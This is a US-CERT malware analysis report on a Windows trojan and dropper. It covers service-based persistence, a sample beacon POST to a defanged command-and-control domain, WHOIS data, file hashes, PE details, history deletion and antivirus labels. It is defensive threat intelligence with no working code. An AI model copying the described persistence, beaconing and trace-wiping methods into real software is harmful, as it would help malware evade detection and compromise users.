MAR-10303705.r1.v1
Malware Characterization
This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.
US-CERT
2020-09-29T09:39:59-04:00
\AppData\Roaming\Media\mediaplayer.exe
HKLM\System\CurrentControlSet\Services\TaskFrame DisplayName: TaskFrame
HKLM\System\CurrentControlSet\Services\TaskFrame ObjectName: LocalSystem
--- End Service Parameters ---
This service is used to create persistence on the system and is designed to start the 'mediaplayer.exe' (927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae) program each time the system is started.
Next, the program will collect system information to send to the command and control (C2). A unique identifier is created and sent in a POST request along with a Unix timestamp of the time of infection to the domain www[.]sdvro.net. Connection attempts are made via both HTTP and HTTPS. The following is a sample of the POST request:
--- Begin POST Request ---
POST /v?m=u2fssrqh8cl0&i=1598908417 HTTP/1.1
Accept: application/octet-stream,application/xhtml
Content-Length: 436
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75
Host: www[.]sdvro.net
Connection: Keep-Alive
Cache-Control: no-cache
--- End POST Request ---
The domain did not resolve to an IP address at the time of analysis. Note: the malware uses the fixed User-Agent string "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75" in its communication.
The following notable strings were found in unreferenced data within the file. The purpose of the strings could not be determined. The strings are not used by the code.
--- Begin Notable Strings ---
C:\Users\david\AppData\Roaming\Media\mediaplayer.exe
david-pc
--- End Notable Strings ---
File: 448838B2A60484EE78C2198F2C0C9C85
Size: 117760 bytes
Type: PE32 executable (GUI) Intel 80386, for MS Windows
MD5: 448838b2a60484ee78c2198f2c0c9c85
SHA1: f2c43a01cabaa694228f5354ea8c6bcf3b7a49b3
SHA256: 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273
SHA512: 9e532af06e5f4764529211e8c5c749baa7b01c72f11b603218c3c08d70cf1e732f8d9d81ec257ca247aaa96d1502150a2f402b1b3914780b6344222b007dd53f
SSDEEP: 3072:PGA5q4Xmco7ciR7BiU+q+TESaiQ4RHpxJdW:O0qtUYBiU+qRiQy
Compiler: Microsoft Visual C++ ?.?
6.156007
6
Compile Date: 2019-04-29 10:19:52-04:00
PE Sections (name, raw size, entropy, MD5):
header: 1024 bytes, entropy 2.390635, MD5 502dceaf120f990b5118230438102568
.text: 39424 bytes, entropy 6.506891, MD5 1ec70611505f1cebfc859820b45b6cc3
.rdata: 12288 bytes, entropy 4.988754, MD5 dfebe81d71d56100ac07b85046f07b77
.data: 59392 bytes, entropy 6.004077, MD5 06f5259aac1a4462eaf12334dc0e8daf
.rsrc: 512 bytes, entropy 5.105006, MD5 c2d6c399730fd89b16d2b6d6cec5e393
.reloc: 5120 bytes, entropy 3.993742, MD5 1587227ab56ecfb9c5b85aaf24d98454
sdvro.net
Ports: 80/TCP, 443/TCP
Domain Name: SDVRO.NET
Registry Domain ID: 2371496862_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.west263.com
Registrar URL: http://www.west.cn/
Updated Date: 2020-03-31T08:26:43Z
Creation Date: 2019-03-21T07:42:43Z
Registry Expiry Date: 2021-03-21T07:42:43Z
Registrar: Chengdu West Dimension Digital Technology Co., Ltd.
Registrar IANA ID: 1556
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: ok https://icann.org/epp#ok
Name Server: NS3.MYHOSTADMIN.NET
Name Server: NS4.MYHOSTADMIN.NET
DNSSEC: unsigned
Domain Name: sdvro.net
Registry Domain ID: whois protect
Registrar WHOIS Server: whois.west.cn
Registrar URL: www.west.cn
Updated Date: 2019-03-21T07:42:42.0Z
Creation Date: 2019-03-21T07:42:42.0Z
Registrar Registration Expiration Date: 2021-03-21T07:42:42.0Z
Registrar: Chengdu west dimension digital technology Co., LTD
Registrar IANA ID: 1556
Reseller:
Domain Status: ok http://www.icann.org/epp#ok
Registry Registrant ID: Not Available From Registry
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: Chengdu
Registrant State/Province: Sichuan
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: CN
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: link at https://www.west.cn/web/whoisform?domain=sdvro.net
Registry Admin ID: Not Available From Registry
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: Chengdu
Admin State/Province: Sichuan
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: CN
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: link at https://www.west.cn/web/whoisform?domain=sdvro.net
Registry Tech ID: Not Available From Registry
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: Chengdu
Tech State/Province: Sichuan
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: CN
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: link at https://www.west.cn/web/whoisform?domain=sdvro.net
Name Server: ns3.myhostadmin.net
Name Server: ns4.myhostadmin.net
DNSSEC: signedDelegation
File: mediaplayer.exe
Size: 46080 bytes
Type: PE32 executable (GUI) Intel 80386, for MS Windows
MD5: 9f23bd89694b66d8a67bb18434da4ee8
SHA1: db8c6ea90b1be5aa560bfbe5a34577eb284243af
SHA256: 927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae
SHA512: 72e95a90dc8ee2fd69b26665e88d19b1d36527fe8bbc03e252d4be925cf4acae20a3155dcd7caa50daf6e16d201a16822d77356c91654a6e4a05981425574c5b
SSDEEP: 768:NRw4PZcMc8ie9+dZL6DSKdzxSGyCevVcxjw3e3PxKfRXAxo3vhxfFORpa9sxw:NRwaBiU+dZODSKeGHSaxjw3QUfRH/hx7
Compiler: Microsoft Visual C++ ?.?
6.320571
6
Compile Date: 2019-04-29 10:18:34-04:00
PE Version Information:
CompanyName: Tdl Corporation
FileDescription: Local Security Process
FileVersion: 1.0.0.1
InternalName: None
LegalCopyright: Copyright (C) 2018
OriginalFilename: None
ProductName: Tdl Corporation
ProductVersion: 1.0.0.1
PE Sections (name, raw size, entropy, MD5):
header: 1024 bytes, entropy 2.514929, MD5 faf4cd402ffdb84551c382ea45f2f893
.text: 31232 bytes, entropy 6.493665, MD5 7e3095c827af75a349f3c206925932cd
.rdata: 8192 bytes, entropy 5.232371, MD5 614ccbacb5de6dae94b6af93aa5a83fc
.data: 1536 bytes, entropy 4.679413, MD5 543ffbd535401feb9f37c585d9f161f3
.rsrc: 1024 bytes, entropy 2.333786, MD5 7c1584feb039309d7a4307c39adaa54f
.reloc: 3072 bytes, entropy 4.519356, MD5 79345fb74e56359cd6eb957ceb52e0ab
Global\mukimukix0
RasPbFile
\AppData\Local\Temp\wHPEO.exe
--- End Registry Modification ---
This modification ensures that the file is deleted at the next system restart. The program also deletes the user's 'index.dat' file, thereby removing the user's recent Internet history from the system.
File: wHPEO.exe
Size: 7168 bytes
Type: PE32 executable (GUI) Intel 80386, for MS Windows
MD5: 92a40c64cea4a87de1c24437612f2e0f
SHA1: f52f0685a72d6a8f3e119ce92b7cf1c2c6a83bb9
SHA256: 4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa
SHA512: d0714d09dcac070eb8d0971e953ce0c0382658d5682982a8045dcf29da9a729be57dc7d60c4e18f1833966f6c6584e9a883871eef8d1c9f9d3b5dd100c69b9a4
SSDEEP: 192:DcTrBTVdZzgW+mpWpc9aThFJJRmqSA9iu:c7EmpWpc9aThFVviu
Compiler: Microsoft Visual C++ ?.?
5.395407
6
Compile Date: 2017-12-04 08:14:24-05:00
PE Sections (name, raw size, entropy, MD5):
header: 1024 bytes, entropy 2.379332, MD5 d6cd352d657372b25707fed98bc3bd0b
.text: 2560 bytes, entropy 5.788179, MD5 c036d2e814490871e54dd84e8117e044
.rdata: 1536 bytes, entropy 4.849405, MD5 2f2819452977bcfd6dcac4389a2cd193
.data: 512 bytes, entropy 1.342806, MD5 afadce14c7f045a0390158515331a054
.rsrc: 1024 bytes, entropy 5.19446, MD5 554d0cedd69e96ee00c8324ce4da604c
.reloc: 512 bytes, entropy 4.74113, MD5 ed7fec6ad28b233df4676dad7f306c3c
Indicator: MD5 and SHA1 of Malicious File (Malware Artifacts)
MD5: 448838b2a60484ee78c2198f2c0c9c85
SHA1: f2c43a01cabaa694228f5354ea8c6bcf3b7a49b3
SHA256: 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273
Source: NCCIC, 2020-09-30T19:15:35+00:00
Indicator: Malicious Domain (Domain Watchlist)
Domain: sdvro.net
Source: NCCIC, 2020-09-30T19:15:35+00:00
Indicator: MD5 and SHA1 of Malicious File (Malware Artifacts)
MD5: 9f23bd89694b66d8a67bb18434da4ee8
SHA1: db8c6ea90b1be5aa560bfbe5a34577eb284243af
SHA256: 927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae
Source: NCCIC, 2020-09-30T19:15:35+00:00
Indicator: MD5 and SHA1 of Malicious File (Malware Artifacts)
MD5: 92a40c64cea4a87de1c24437612f2e0f
SHA1: f52f0685a72d6a8f3e119ce92b7cf1c2c6a83bb9
SHA256: 4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa
Source: NCCIC, 2020-09-30T19:15:35+00:00
MAEC Characterization of 448838b2a60484ee78c2198f2c0c9c85
Antivirus detections:
BitDefender: Dropped:Generic.Malware.Fdldg.B04B59A4
Comodo: TrojWare.Win32.ButeRat.PP
Emsisoft: Dropped:Generic.Malware.Fdldg.B04B59A4 (B)
Lavasoft: Dropped:Generic.Malware.Fdldg.B04B59A4
Ikarus: Trojan-PWS.Win32.Zbot
Labels: bot, dropper, information-stealer, keylogger, remote-access-trojan, trojan, command-and-control
MAEC Characterization of 9f23bd89694b66d8a67bb18434da4ee8
Antivirus detections:
Symantec: Heur.AdvML.B
BitDefender: Gen:Variant.Fugrafa.6689
Emsisoft: Gen:Variant.Fugrafa.6689 (B)
Lavasoft: Gen:Variant.Fugrafa.6689
10303705.r1.v1
Malicious Code
Malicious Artifact Detected